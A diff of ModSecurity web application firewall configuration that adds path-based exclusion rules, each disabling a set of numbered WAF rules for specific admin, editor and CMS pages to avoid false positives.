+SecRule REQUEST_FILENAME "/blog-edit\.php" "phase:2,id:95186,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/index/pdfsettings/" "phase:2,id:95187,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:95188,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:95189,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/livehelpnew/agent/" "phase:2,id:95190,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/scripts/track\.php" "phase:2,id:95191,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/ckeditor/xss" "phase:2,id:95192,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/process/process_job\.php" "phase:2,id:95193,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/process/update_job\.php" "phase:2,id:95194,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/eventpendingaction\.php" "phase:2,id:95195,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/textpattern/index\.php" "phase:2,id:95196,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/connectors/browser/file\.php" "phase:2,id:95197,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/code_editor\.php" "phase:2,id:95198,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/connectors/security/access/policy/template\.php" "phase:2,id:95199,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/login\.php" "phase:2,id:95200,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300079"
+
+SecRule REQUEST_FILENAME "/admin_edit_cat\.php" "phase:2,id:95201,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/delivery/ajs\.php" "phase:2,id:95202,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/members/proc_grp_email\.php" "phase:2,id:95203,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/edit_offer\.php" "phase:2,id:95204,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/manager/index\.php" "phase:2,id:95205,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/invoices\.php" "phase:2,id:95206,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/aw/cat\.php" "phase:2,id:95207,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/register_warranty\.php" "phase:2,id:95208,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/support/agent/index\.php" "phase:2,id:95209,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/we_cmd\.php" "phase:2,id:95210,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:95211,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/infraction\.php" "phase:2,id:95212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/za/zcadm" "phase:2,id:95213,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/updatemenu\.php" "phase:2,id:95214,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/ustawienia\.php" "phase:2,id:95215,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/front_content\.php" "phase:2,id:95216,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/amember/unsubscribe\.php" "phase:2,id:95217,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/addnews\.php" "phase:2,id:95218,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/nereus/article-edit\.php" "phase:2,id:95219,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/contao/main\.php" "phase:2,id:95220,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300076"
+
+SecRule REQUEST_FILENAME "/mt\.cgi" "phase:2,id:95221,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300076"
+
+SecRule REQUEST_FILENAME "/dash/index\.php" "phase:2,id:95222,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300076"
+
+SecRule REQUEST_FILENAME "/categories\.php" "phase:2,id:95223,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tiki-edit_css\.php" "phase:2,id:95224,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/securelogin/configuration\.php" "phase:2,id:95225,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/account/" "phase:2,id:95226,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/account/saved-designs/" "phase:2,id:95227,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/otrs/index\.pl" "phase:2,id:95228,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/define_bottompage\.php" "phase:2,id:95229,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/addonmodules\.php" "phase:2,id:95230,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/plugins/system/" "phase:2,id:95231,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/bfaudit\.php" "phase:2,id:95232,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/filefield/" "phase:2,id:95233,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/pma/import\.php" "phase:2,id:95234,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/securelogin/" "phase:2,id:95235,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/define_header\.php" "phase:2,id:95236,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/product_print\.php" "phase:2,id:95237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/offers_engine\.php" "phase:2,id:95238,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/modules/custom/shopping_centre/" "phase:2,id:95239,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/changetitle\.php" "phase:2,id:95240,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/edittitle\.php" "phase:2,id:95241,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/pages/clients-massive\.php" "phase:2,id:95242,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/documents/blog\.php" "phase:2,id:95243,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/aendern_erg\.php" "phase:2,id:95244,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/aendern\.php" "phase:2,id:95245,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/sendgrid/unsub\.php" "phase:2,id:95246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/sendgrid/sub\.php" "phase:2,id:95247,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/item/edit/index\.php" "phase:2,id:95248,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/moodle/mod/lesson/editpage\.php" "phase:2,id:95249,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
